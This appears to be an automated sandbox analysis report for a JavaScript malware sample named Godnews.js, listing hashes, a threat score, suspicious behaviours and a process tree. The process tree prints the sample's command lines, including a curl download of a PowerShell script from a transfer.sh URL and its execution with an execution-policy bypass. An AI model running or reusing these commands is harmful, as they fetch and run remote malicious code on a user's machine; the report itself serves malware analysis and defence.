3d1e0ad113774a38925d0e4d26c4e03f91489598065ad65c69c9e284985e0d78

Analysis

max time kernel
288s
max time network
331s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
25/11/2022, 18:54

Target

Godnews.js
Size

1024KB
MD5

c0110366d42437cb7edffeeef4afa865
SHA1

0b7937b71b40d0dcf81151e85034117b197e1773
SHA256

3d1e0ad113774a38925d0e4d26c4e03f91489598065ad65c69c9e284985e0d78
SHA512

4fa4ad37df3270a921e03facecd3b26a8ba5f5933e98045140aa3bb3982b823c5d346d4723af5d2de8ea03b2d838574ca36eb44ea6bb30490154db641488bb2b
SSDEEP

24576:6FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFT:

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1872	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1872	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1156 wrote to memory of 544	1156	wscript.exe	28
PID 1156 wrote to memory of 544	1156	wscript.exe	28
PID 1156 wrote to memory of 544	1156	wscript.exe	28
PID 544 wrote to memory of 1496	544	wscript.exe	29
PID 544 wrote to memory of 1496	544	wscript.exe	29
PID 544 wrote to memory of 1496	544	wscript.exe	29
PID 1496 wrote to memory of 580	1496	cmd.exe	31
PID 1496 wrote to memory of 580	1496	cmd.exe	31
PID 1496 wrote to memory of 580	1496	cmd.exe	31
PID 544 wrote to memory of 780	544	wscript.exe	32
PID 544 wrote to memory of 780	544	wscript.exe	32
PID 544 wrote to memory of 780	544	wscript.exe	32
PID 780 wrote to memory of 1760	780	cmd.exe	34
PID 780 wrote to memory of 1760	780	cmd.exe	34
PID 780 wrote to memory of 1760	780	cmd.exe	34
PID 1760 wrote to memory of 1872	1760	cmd.exe	35
PID 1760 wrote to memory of 1872	1760	cmd.exe	35
PID 1760 wrote to memory of 1872	1760	cmd.exe	35

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Godnews.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1156
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\GOOD.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:544
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/hwvb7k/GRET.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1496
  - - C:\Windows\system32\cmd.exe
      cmd.exe /c curl https://transfer.sh/get/hwvb7k/GRET.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
      4⤵
      PID:580
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:780
  - - C:\Windows\system32\cmd.exe
      cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1760
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1872

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

C:\Users\Admin\AppData\Local\Temp\GOOD.vbs

Filesize
111KB

MD5
4674ac388e0900a19e8691c8037000a7

SHA1
77e402a88efd8cf38e1c2a16e9e74651159c284b

SHA256
dbc19279791a65ec36db13645dda7e745e3892e9040ff1ce5fee6371b2e7d9ea

SHA512
4acfca76fe38c8a2675f8363eb57b2a786907fd44b87f5680cee6ae73deabd2626781d1360624246c93eda34eb681796c9ebe0168676bb5d76de5bd3b17eb9a9

Download Submit
memory/1156-54-0x000007FEFB9C1000-0x000007FEFB9C3000-memory.dmp

Filesize
8KB

Download
memory/1872-64-0x000007FEF3550000-0x000007FEF3F73000-memory.dmp

Filesize
10.1MB

Download
memory/1872-66-0x0000000002514000-0x0000000002517000-memory.dmp

Filesize
12KB

Download
memory/1872-65-0x000007FEF29F0000-0x000007FEF354D000-memory.dmp

Filesize
11.4MB

Download
memory/1872-67-0x000000001B7D0000-0x000000001BACF000-memory.dmp

Filesize
3.0MB

Download
memory/1872-68-0x0000000002514000-0x0000000002517000-memory.dmp

Filesize
12KB

Download
memory/1872-69-0x000000000251B000-0x000000000253A000-memory.dmp

Filesize
124KB

Download